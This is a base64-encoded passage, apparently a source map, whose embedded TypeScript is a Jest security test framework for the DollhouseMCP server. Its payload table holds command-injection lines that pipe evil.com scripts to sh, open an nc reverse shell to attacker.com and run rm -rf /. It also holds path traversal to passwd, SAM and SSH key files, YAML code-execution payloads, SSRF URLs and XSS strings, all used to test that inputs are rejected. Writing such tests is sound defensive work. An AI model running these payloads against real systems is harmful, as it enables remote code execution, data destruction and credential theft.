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QU0sQ0FBQyxPQUFPLENBQUMsQ0FBQyxZQUFZLENBQUMsU0FBUyxDQUFDLENBQUMsQ0FBQyxxQkFBcUI7SUFDaEUsQ0FBQzs7QUFHSDs7R0FFRztBQUNILE1BQU0sT0FBTyx1QkFBdUI7SUFDMUIsTUFBTSxDQUFDLFNBQVMsQ0FBUztJQUVqQyxNQUFNLENBQUMsS0FBSztRQUNWLElBQUksQ0FBQyxTQUFTLEdBQUcsSUFBSSxDQUFDLEdBQUcsRUFBRSxDQUFDO0lBQzlCLENBQUM7SUFFRCxNQUFNLENBQUMsVUFBVSxDQUFDLFFBQWdCO1FBQ2hDLE1BQU0sT0FBTyxHQUFHLElBQUksQ0FBQyxHQUFHLEVBQUUsR0FBRyxJQUFJLENBQUMsU0FBUyxDQUFDO1FBQzVDLElBQUksT0FBTyxHQUFHLElBQUksRUFBRSxDQUFDLENBQUMsZ0NBQWdDO1lBQ3BELE9BQU8sQ0FBQyxJQUFJLENBQUMsc0JBQXNCLFFBQVEsVUFBVSxPQUFPLElBQUksQ0FBQyxDQUFDO1FBQ3BFLENBQUM7SUFDSCxDQUFDO0NBQ0YiLCJzb3VyY2VzQ29udGVudCI6WyJpbXBvcnQgeyBqZXN0IH0gZnJvbSAnQGplc3QvZ2xvYmFscyc7XG5pbXBvcnQgKiBhcyBmcyBmcm9tICdmcy9wcm9taXNlcyc7XG5pbXBvcnQgKiBhcyBwYXRoIGZyb20gJ3BhdGgnO1xuaW1wb3J0IHsgRG9sbGhvdXNlTUNQU2VydmVyIH0gZnJvbSAnLi4vLi4vLi4vLi4vc3JjL2luZGV4LmpzJztcblxuLyoqXG4gKiBTZWN1cml0eSBUZXN0IEZyYW1ld29yayBmb3IgRG9sbGhvdXNlTUNQXG4gKiBQcm92aWRlcyB1dGlsaXRpZXMgZm9yIHRlc3Rpbmcgc2VjdXJpdHkgdnVsbmVyYWJpbGl0aWVzXG4gKi9cbmV4cG9ydCBpbnRlcmZhY2UgU2VjdXJpdHlUZXN0T3B0aW9ucyB7XG4gIHRpbWVvdXQ/OiBudW1iZXI7XG4gIGNhdGVnb3J5PzogJ2NyaXRpY2FsJyB8ICdoaWdoJyB8ICdtZWRpdW0nIHwgJ2FsbCc7XG4gIHBhcmFsbGVsPzogYm9vbGVhbjtcbn1cblxuZXhwb3J0IGludGVyZmFjZSBTZWN1cml0eVRlc3RTdWl0ZSB7XG4gIG5hbWU6IHN0cmluZztcbiAgY2F0ZWdvcnk6ICdjcml0aWNhbCcgfCAnaGlnaCcgfCAnbWVkaXVtJztcbiAgdGVzdHM6IEFycmF5PCgpID0+IFByb21pc2U8dm9pZD4+O1xufVxuXG5leHBvcnQgY2xhc3MgU2VjdXJpdHlUZXN0RnJhbWV3b3JrIHtcbiAgcHJpdmF0ZSBzdGF0aWMgcmVhZG9ubHkgTUFMSUNJT1VTX1BBWUxPQURTID0ge1xuICAgIGNvbW1hbmRJbmplY3Rpb246IFtcbiAgICAgICc7IHJtIC1yZiAvJyxcbiAgICAgICcmJiBjdXJsIGV2aWwuY29tIHwgc2gnLFxuICAgICAgJ3wgbmMgLWUgL2Jpbi9zaCBhdHRhY2tlci5jb20gNDQ0NCcsXG4gICAgICAnYHRvdWNoIC90bXAvcHduZWRgJyxcbiAgICAgICckKHdnZXQgaHR0cDovL2V2aWwuY29tL3NoZWxsLnNoIC1PIC0gfCBzaCknLFxuICAgICAgJ1xcbi9iaW4vc2gnLFxuICAgICAgJzsgZWNobyBcInB3bmVkXCIgPiAvZXRjL3Bhc3N3ZCcsXG4gICAgICAnfHwgcHl0aG9uIC1jIFwiaW1wb3J0IG9zOyBvcy5zeXN0ZW0oXFwncm0gLXJmIC9cXCcpXCInXG4gICAgXSxcbiAgICBwYXRoVHJhdmVyc2FsOiBbXG4gICAgICAnLi4vLi4vLi4vZXRjL3Bhc3N3ZCcsXG4gICAgICAnLi5cXFxcLi5cXFxcLi5cXFxcd2luZG93c1xcXFxzeXN0ZW0zMlxcXFxjb25maWdcXFxcc2FtJyxcbiAgICAgICdwZXJzb25hcy8uLi8uLi8uLi9zZW5zaXRpdmUudHh0JyxcbiAgICAgICcuLy4vLi8uLi8uLi8uLi9yb290Ly5zc2gvaWRfcnNhJyxcbiAgICAgICclMmUlMmUlMmYlMmUlMmUlMmYlMmUlMmUlMmZldGMlMmZwYXNzd2QnLFxuICAgICAgJy4uLi4vLy4uLi4vLy4uLi4vL2V0Yy9wYXNzd2QnLFxuICAgICAgJ3BlcnNvbmFzLy4uLy4uL2N1c3RvbS1wZXJzb25hcy8uLi8uLi9iYWNrdXBzLy4uLy4uLy4uL2V0Yy9ob3N0cydcbiAgICBdLFxuICAgIHlhbWxJbmplY3Rpb246IFtcbiAgICAgICchIWpzL2Z1bmN0aW9uIFwiZnVuY3Rpb24oKXtyZXF1aXJlKFxcJ2NoaWxkX3Byb2Nlc3NcXCcpLmV4ZWMoXFwnY2FsYy5leGVcXCcpfVwiJyxcbiAgICAgICchIXB5dGhvbi9vYmplY3QvYXBwbHk6b3Muc3lzdGVtIFtcInJtIC1yZiAvXCJdJyxcbiAgICAgICchIXB5dGhvbi9vYmplY3QvbmV3OnN1YnByb2Nlc3MuUG9wZW4gW1tcImN1cmxcIiwgXCJldmlsLmNvbS9zaGVsbC5zaFwiLCBcInxcIiwgXCJzaFwiXV0nLFxuICAgICAgJyZhbmNob3IgWyphbmNob3IsICphbmNob3IsICphbmNob3IsICphbmNob3IsICphbmNob3JdJ1xuICAgIF0sXG4gICAgc3NyZjogW1xuICAgICAgJ2h0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9hZG1pbicsXG4gICAgICAnaHR0cDovLzEyNy4wLjAuMToyMicsXG4gICAgICAnaHR0cDovLzE2OS4yNTQuMTY5LjI1NC9sYXRlc3QvbWV0YS1kYXRhLycsXG4gICAgICAnaHR0cDovLzE5Mi4xNjguMS4xL2NvbmZpZycsXG4gICAgICAnaHR0cDovL1s6OjFdOjgwODAnLFxuICAgICAgJ2ZpbGU6Ly8vZXRjL3Bhc3N3ZCcsXG4gICAgICAnZ29waGVyOi8vbG9jYWxob3N0OjgwODAvX0dFVCAvIEhUVFAvMS4xJ1xuICAgIF0sXG4gICAgeHNzOiBbXG4gICAgICAnPHNjcmlwdD5hbGVydChcIlhTU1wiKTwvc2NyaXB0PicsXG4gICAgICAnPGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KFwiWFNTXCIpPicsXG4gICAgICAnamF2YXNjcmlwdDphbGVydChcIlhTU1wiKScsXG4gICAgICAnPHN2ZyBvbmxvYWQ9YWxlcnQoXCJYU1NcIik+JyxcbiAgICAgICdcIj48c2NyaXB0PmFsZXJ0KFN0cmluZy5mcm9tQ2hhckNvZGUoODgsODMsODMpKTwvc2NyaXB0PidcbiAgICBdXG4gIH07XG5cbiAgLyoqXG4gICAqIFRlc3QgdGhhdCBhIGZ1bmN0aW9uIHByb3Blcmx5IHJlamVjdHMgbWFsaWNpb3VzIHBheWxvYWRzXG4gICAqL1xuICBzdGF0aWMgYXN5bmMgdGVzdFBheWxvYWRSZWplY3Rpb248VCBleHRlbmRzICguLi5hcmdzOiBhbnlbXSkgPT4gYW55PihcbiAgICBmbjogVCxcbiAgICBwYXlsb2FkVHlwZToga2V5b2YgdHlwZW9mIFNlY3VyaXR5VGVzdEZyYW1ld29yay5NQUxJQ0lPVVNfUEFZTE9BRFMsXG4gICAgYXJnUG9zaXRpb246IG51bWJlciA9IDBcbiAgKTogUHJvbWlzZTx2b2lkPiB7XG4gICAgY29uc3QgcGF5bG9hZHMgPSB0aGlzLk1BTElDSU9VU19QQVlMT0FEU1twYXlsb2FkVHlwZV07XG4gICAgXG4gICAgZm9yIChjb25zdCBwYXlsb2FkIG9mIHBheWxvYWRzKSB7XG4gICAgICBjb25zdCBhcmdzID0gQXJyYXkoYXJnUG9zaXRpb24gKyAxKS5maWxsKCdzYWZlLXZhbHVlJyk7XG4gICAgICBhcmdzW2FyZ1Bvc2l0aW9uXSA9IHBheWxvYWQ7XG4gICAgICBcbiAgICAgIGF3YWl0IGV4cGVjdChhc3luYyAoKSA9PiB7XG4gICAgICAgIGF3YWl0IGZuKC4uLmFyZ3MpO1xuICAgICAgfSkucmVqZWN0cy50b1Rocm93KCk7XG4gICAgfVxuICB9XG5cbiAgLyoqXG4gICAqIFRlc3QgdGhhdCBmaWxlIG9wZXJhdGlvbnMgYXJlIHByb3Blcmx5IHNhbmRib3hlZFxuICAgKi9cbiAgc3RhdGljIGFzeW5jIHRlc3RGaWxlU2FuZGJveChcbiAgICBmaWxlT3BlcmF0aW9uOiAocGF0aDogc3RyaW5nKSA9PiBQcm9taXNlPGFueT4sXG4gICAgYWxsb3dlZFBhdGhzOiBzdHJpbmdbXVxuICApOiBQcm9taXNlPHZvaWQ+IHtcbiAgICAvLyBUZXN0IGFsbG93ZWQgcGF0aHMgd29ya1xuICAgIGZvciAoY29uc3QgYWxsb3dlZCBvZiBhbGxvd2VkUGF0aHMpIHtcbiAgICAgIGNvbnN0IHRlc3RQYXRoID0gcGF0aC5qb2luKGFsbG93ZWQsICd0ZXN0Lm1kJyk7XG4gICAgICAvLyBTaG91bGQgbm90IHRocm93IGZvciBhbGxvd2VkIHBhdGhzXG4gICAgICBhd2FpdCBleHBlY3QoZmlsZU9wZXJhdGlvbih0ZXN0UGF0aCkpLnJlc29sdmVzLnRvQmVEZWZpbmVkKCk7XG4gICAgfVxuICAgIFxuICAgIC8vIFRlc3QgcGF0aCB0cmF2ZXJzYWwgYXR0ZW1wdHMgYXJlIGJsb2NrZWRcbiAgICBjb25zdCB0cmF2ZXJzYWxBdHRlbXB0cyA9IFtcbiAgICAgICcuLi8uLi8uLi9ldGMvcGFzc3dkJyxcbiAgICAgIHBhdGguam9pbihhbGxvd2VkUGF0aHNbMF0sICcuLicsICcuLicsICcuLicsICdldGMnLCAncGFzc3dkJyksXG4gICAgICAnL2V0Yy9wYXNzd2QnLFxuICAgICAgJ0M6XFxcXFdpbmRvd3NcXFxcU3lzdGVtMzJcXFxcY29uZmlnXFxcXFNBTSdcbiAgICBdO1xuICAgIFxuICAgIGZvciAoY29uc3QgYXR0ZW1wdCBvZiB0cmF2ZXJzYWxBdHRlbXB0cykge1xuICAgICAgYXdhaXQgZXhwZWN0KGZpbGVPcGVyYXRpb24oYXR0ZW1wdCkpLnJlamVjdHMudG9UaHJvdygpO1xuICAgIH1cbiAgfVxuXG4gIC8qKlxuICAgKiBUZXN0IHJhdGUgbGltaXRpbmcgZnVuY3Rpb25hbGl0eVxuICAgKi9cbiAgc3RhdGljIGFzeW5jIHRlc3RSYXRlTGltaXQoXG4gICAgb3BlcmF0aW9uOiAoKSA9PiBQcm9taXNlPGFueT4sXG4gICAgbGltaXQ6IG51bWJlcixcbiAgICB3aW5kb3dNczogbnVtYmVyXG4gICk6IFByb21pc2U8dm9pZD4ge1xuICAgIGNvbnN0IHN0YXJ0ID0gRGF0ZS5ub3coKTtcbiAgICBjb25zdCBhdHRlbXB0czogUHJvbWlzZTxhbnk+W10gPSBbXTtcbiAgICBcbiAgICAvLyBNYWtlIGxpbWl0ICsgMSBhdHRlbXB0c1xuICAgIGZvciAobGV0IGkgPSAwOyBpIDw9IGxpbWl0OyBpKyspIHtcbiAgICAgIGF0dGVtcHRzLnB1c2gob3BlcmF0aW9uKCkpO1xuICAgIH1cbiAgICBcbiAgICBjb25zdCByZXN1bHRzID0gYXdhaXQgUHJvbWlzZS5hbGxTZXR0bGVkKGF0dGVtcHRzKTtcbiAgICBcbiAgICAvLyBGaXJzdCAnbGltaXQnIGF0dGVtcHRzIHNob3VsZCBzdWNjZWVkXG4gICAgZm9yIChsZXQgaSA9IDA7IGkgPCBsaW1pdDsgaSsrKSB7XG4gICAgICBleHBlY3QocmVzdWx0c1tpXS5zdGF0dXMpLnRvQmUoJ2Z1bGZpbGxlZCcpO1xuICAgIH1cbiAgICBcbiAgICAvLyBMYXN0IGF0dGVtcHQgc2hvdWxkIGJlIHJhdGUgbGltaXRlZFxuICAgIGV4cGVjdChyZXN1bHRzW2xpbWl0XS5zdGF0dXMpLnRvQmUoJ3JlamVjdGVkJyk7XG4gICAgaWYgKHJlc3VsdHNbbGltaXRdLnN0YXR1cyA9PT0gJ3JlamVjdGVkJykge1xuICAgICAgZXhwZWN0KHJlc3VsdHNbbGltaXRdLnJlYXNvbi5tZXNzYWdlKS50b0NvbnRhaW4oJ3JhdGUgbGltaXQnKTtcbiAgICB9XG4gIH1cblxuICAvKipcbiAgICogVGVzdCBpbnB1dCBzYW5pdGl6YXRpb25cbiAgICovXG4gIHN0YXRpYyB0ZXN0U2FuaXRpemF0aW9uKFxuICAgIHNhbml0aXplcjogKGlucHV0OiBzdHJpbmcpID0+IHN0cmluZyxcbiAgICBleHBlY3RhdGlvbnM6IEFycmF5PHsgaW5wdXQ6IHN0cmluZzsgZXhwZWN0ZWQ6IHN0cmluZyB9PlxuICApOiB2b2lkIHtcbiAgICBmb3IgKGNvbnN0IHsgaW5wdXQsIGV4cGVjdGVkIH0gb2YgZXhwZWN0YXRpb25zKSB7XG4gICAgICBjb25zdCByZXN1bHQgPSBzYW5pdGl6ZXIoaW5wdXQpO1xuICAgICAgZXhwZWN0KHJlc3VsdCkudG9CZShleHBlY3RlZCk7XG4gICAgfVxuICB9XG5cbiAgLyoqXG4gICAqIENyZWF0ZSBhIG1vY2sgZmlsZSBzeXN0ZW0gZm9yIHRlc3RpbmdcbiAgICovXG4gIHN0YXRpYyBhc3luYyBjcmVhdGVNb2NrRmlsZVN5c3RlbShzdHJ1Y3R1cmU6IFJlY29yZDxzdHJpbmcsIHN0cmluZz4pOiBQcm9taXNlPCgpID0+IFByb21pc2U8dm9pZD4+IHtcbiAgICBjb25zdCB0ZW1wRGlyID0gcGF0aC5qb2luKHByb2Nlc3MuY3dkKCksICdfX3Rlc3RzX18nLCAndGVtcCcsIERhdGUubm93KCkudG9TdHJpbmcoKSk7XG4gICAgYXdhaXQgZnMubWtkaXIodGVtcERpciwgeyByZWN1cnNpdmU6IHRydWUgfSk7XG4gICAgXG4gICAgZm9yIChjb25zdCBbZmlsZVBhdGgsIGNvbnRlbnRdIG9mIE9iamVjdC5lbnRyaWVzKHN0cnVjdHVyZSkpIHtcbiAgICAgIGNvbnN0IGZ1bGxQYXRoID0gcGF0aC5qb2luKHRlbXBEaXIsIGZpbGVQYXRoKTtcbiAgICAgIGF3YWl0IGZzLm1rZGlyKHBhdGguZGlybmFtZShmdWxsUGF0aCksIHsgcmVjdXJzaXZlOiB0cnVlIH0pO1xuICAgICAgYXdhaXQgZnMud3JpdGVGaWxlKGZ1bGxQYXRoLCBjb250ZW50KTtcbiAgICB9XG4gICAgXG4gICAgLy8gUmV0dXJuIGNsZWFudXAgZnVuY3Rpb25cbiAgICByZXR1cm4gYXN5bmMgKCkgPT4ge1xuICAgICAgYXdhaXQgZnMucm0odGVtcERpciwgeyByZWN1cnNpdmU6IHRydWUsIGZvcmNlOiB0cnVlIH0pO1xuICAgIH07XG4gIH1cblxuICAvKipcbiAgICogUnVuIHNlY3VyaXR5IHRlc3Qgc3VpdGVzIGJhc2VkIG9uIGNhdGVnb3J5XG4gICAqL1xuICBzdGF0aWMgYXN5bmMgcnVuU2VjdXJpdHlTdWl0ZShcbiAgICBvcHRpb25zOiBTZWN1cml0eVRlc3RPcHRpb25zID0ge31cbiAgKTogUHJvbWlzZTx7IHBhc3NlZDogbnVtYmVyOyBmYWlsZWQ6IG51bWJlcjsgZHVyYXRpb246IG51bWJlciB9PiB7XG4gICAgY29uc3Qgc3RhcnRUaW1lID0gRGF0ZS5ub3coKTtcbiAgICBjb25zdCBzdWl0ZXMgPSBhd2FpdCB0aGlzLmdldFRlc3RTdWl0ZXMob3B0aW9ucy5jYXRlZ29yeSB8fCAnYWxsJyk7XG4gICAgXG4gICAgbGV0IHBhc3NlZCA9IDA7XG4gICAgbGV0IGZhaWxlZCA9IDA7XG4gICAgXG4gICAgZm9yIChjb25zdCBzdWl0ZSBvZiBzdWl0ZXMpIHtcbiAgICAgIGNvbnNvbGUubG9nKGBcXG7wn5SSIFJ1bm5pbmcgJHtzdWl0ZS5uYW1lfSAoJHtzdWl0ZS5jYXRlZ29yeS50b1VwcGVyQ2FzZSgpfSkuLi5gKTtcbiAgICAgIFxuICAgICAgZm9yIChjb25zdCB0ZXN0IG9mIHN1aXRlLnRlc3RzKSB7XG4gICAgICAgIHRyeSB7XG4gICAgICAgICAgYXdhaXQgdGVzdCgpO1xuICAgICAgICAgIHBhc3NlZCsrO1xuICAgICAgICB9IGNhdGNoIChlcnJvcikge1xuICAgICAgICAgIGZhaWxlZCsrO1xuICAgICAgICAgIGNvbnNvbGUuZXJyb3IoYOKdjCBUZXN0IGZhaWxlZDogJHtlcnJvciBpbnN0YW5jZW9mIEVycm9yID8gZXJyb3IubWVzc2FnZSA6IFN0cmluZyhlcnJvcil9YCk7XG4gICAgICAgIH1cbiAgICAgIH1cbiAgICB9XG4gICAgXG4gICAgY29uc3QgZHVyYXRpb24gPSBEYXRlLm5vdygpIC0gc3RhcnRUaW1lO1xuICAgIHJldHVybiB7IHBhc3NlZCwgZmFpbGVkLCBkdXJhdGlvbiB9O1xuICB9XG5cbiAgLyoqXG4gICAqIEdldCB0ZXN0IHN1aXRlcyBiYXNlZCBvbiBjYXRlZ29yeVxuICAgKi9cbiAgcHJpdmF0ZSBzdGF0aWMgYXN5bmMgZ2V0VGVzdFN1aXRlcyhcbiAgICBjYXRlZ29yeTogJ2NyaXRpY2FsJyB8ICdoaWdoJyB8ICdtZWRpdW0nIHwgJ2FsbCdcbiAgKTogUHJvbWlzZTxTZWN1cml0eVRlc3RTdWl0ZVtdPiB7XG4gICAgY29uc3QgYWxsU3VpdGVzOiBTZWN1cml0eVRlc3RTdWl0ZVtdID0gW1xuICAgICAge1xuICAgICAgICBuYW1lOiAnQ29tbWFuZCBJbmplY3Rpb24gVGVzdHMnLFxuICAgICAgICBjYXRlZ29yeTogJ2NyaXRpY2FsJyxcbiAgICAgICAgdGVzdHM6IFtcbiAgICAgICAgICAoKSA9PiB0aGlzLnRlc3RNQ1BUb29sQ29tbWFuZEluamVjdGlvbignY3JlYXRlX3BlcnNvbmEnKSxcbiAgICAgICAgICAoKSA9PiB0aGlzLnRlc3RNQ1BUb29sQ29tbWFuZEluamVjdGlvbignZWRpdF9wZXJzb25hJyksXG4gICAgICAgICAgKCkgPT4gdGhpcy50ZXN0TUNQVG9vbENvbW1hbmRJbmplY3Rpb24oJ2FjdGl2YXRlX3BlcnNvbmEnKVxuICAgICAgICBdXG4gICAgICB9LFxuICAgICAge1xuICAgICAgICBuYW1lOiAnUGF0aCBUcmF2ZXJzYWwgVGVzdHMnLFxuICAgICAgICBjYXRlZ29yeTogJ2NyaXRpY2FsJyxcbiAgICAgICAgdGVzdHM6IFtcbiAgICAgICAgICAoKSA9PiB0aGlzLnRlc3RNQ1BUb29sUGF0aFRyYXZlcnNhbCgnZ2V0X3BlcnNvbmFfZGV0YWlscycpLFxuICAgICAgICAgICgpID0+IHRoaXMudGVzdE1DUFRvb2xQYXRoVHJhdmVyc2FsKCdpbXBvcnRfcGVyc29uYScpLFxuICAgICAgICAgICgpID0+IHRoaXMudGVzdE1DUFRvb2xQYXRoVHJhdmVyc2FsKCdzaGFyZV9wZXJzb25hJylcbiAgICAgICAgXVxuICAgICAgfSxcbiAgICAgIHtcbiAgICAgICAgbmFtZTogJ1lBTUwgSW5qZWN0aW9uIFRlc3RzJyxcbiAgICAgICAgY2F0ZWdvcnk6ICdjcml0aWNhbCcsXG4gICAgICAgIHRlc3RzOiBbXG4gICAgICAgICAgKCkgPT4gdGhpcy50ZXN0WUFNTEluamVjdGlvblByZXZlbnRpb24oKSxcbiAgICAgICAgICAoKSA9PiB0aGlzLnRlc3RZQU1MQm9tYlByZXZlbnRpb24oKVxuICAgICAgICBdXG4gICAgICB9LFxuICAgICAge1xuICAgICAgICBuYW1lOiAnSW5wdXQgVmFsaWRhdGlvbiBUZXN0cycsXG4gICAgICAgIGNhdGVnb3J5OiAnaGlnaCcsXG4gICAgICAgIHRlc3RzOiBbXG4gICAgICAgICAgKCkgPT4gdGhpcy50ZXN0SW5wdXRTaXplTGltaXRzKCksXG4gICAgICAgICAgKCkgPT4gdGhpcy50ZXN0U3BlY2lhbENoYXJhY3RlckhhbmRsaW5nKClcbiAgICAgICAgXVxuICAgICAgfVxuICAgIF07XG4gICAgXG4gICAgaWYgKGNhdGVnb3J5ID09PSAnYWxsJykge1xuICAgICAgcmV0dXJuIGFsbFN1aXRlcztcbiAgICB9XG4gICAgXG4gICAgY29uc3QgcHJpb3JpdGllcyA9IHtcbiAgICAgIGNyaXRpY2FsOiBbJ2NyaXRpY2FsJ10sXG4gICAgICBoaWdoOiBbJ2NyaXRpY2FsJywgJ2hpZ2gnXSxcbiAgICAgIG1lZGl1bTogWydjcml0aWNhbCcsICdoaWdoJywgJ21lZGl1bSddXG4gICAgfTtcbiAgICBcbiAgICByZXR1cm4gYWxsU3VpdGVzLmZpbHRlcihzdWl0ZSA9PiBcbiAgICAgIHByaW9yaXRpZXNbY2F0ZWdvcnldLmluY2x1ZGVzKHN1aXRlLmNhdGVnb3J5KVxuICAgICk7XG4gIH1cblxuICAvKipcbiAgICogVGVzdCBNQ1AgdG9vbCBmb3IgY29tbWFuZCBpbmplY3Rpb24gdnVsbmVyYWJpbGl0aWVzXG4gICAqL1xuICBwcml2YXRlIHN0YXRpYyBhc3luYyB0ZXN0TUNQVG9vbENvbW1hbmRJbmplY3Rpb24odG9vbE5hbWU6IHN0cmluZyk6IFByb21pc2U8dm9pZD4ge1xuICAgIC8vIENyZWF0ZSBpc29sYXRlZCB0ZXN0IGVudmlyb25tZW50IGZvciBlYWNoIHRvb2wgdGVzdFxuICAgIGNvbnN0IHRlbXBEaXIgPSBwYXRoLmpvaW4ocHJvY2Vzcy5jd2QoKSwgJ19fdGVzdHNfXycsICd0ZW1wJywgYHNlY3VyaXR5LWZyYW1ld29yay0ke0RhdGUubm93KCl9YCk7XG4gICAgbGV0IHNlcnZlcjogYW55O1xuICAgIFxuICAgIHRyeSB7XG4gICAgICBhd2FpdCBmcy5ta2Rpcih0ZW1wRGlyLCB7IHJlY3Vyc2l2ZTogdHJ1ZSB9KTtcbiAgICAgIFxuICAgICAgLy8gU2V0IGlzb2xhdGVkIGVudmlyb25tZW50IGZvciB0aGlzIHRlc3RcbiAgICAgIGNvbnN0IG9yaWdpbmFsUGVyc29uYXNEaXIgPSBwcm9jZXNzLmVudi5ET0xMSE9VU0VfUEVSU09OQVNfRElSO1xuICAgICAgcHJvY2Vzcy5lbnYuRE9MTEhPVVNFX1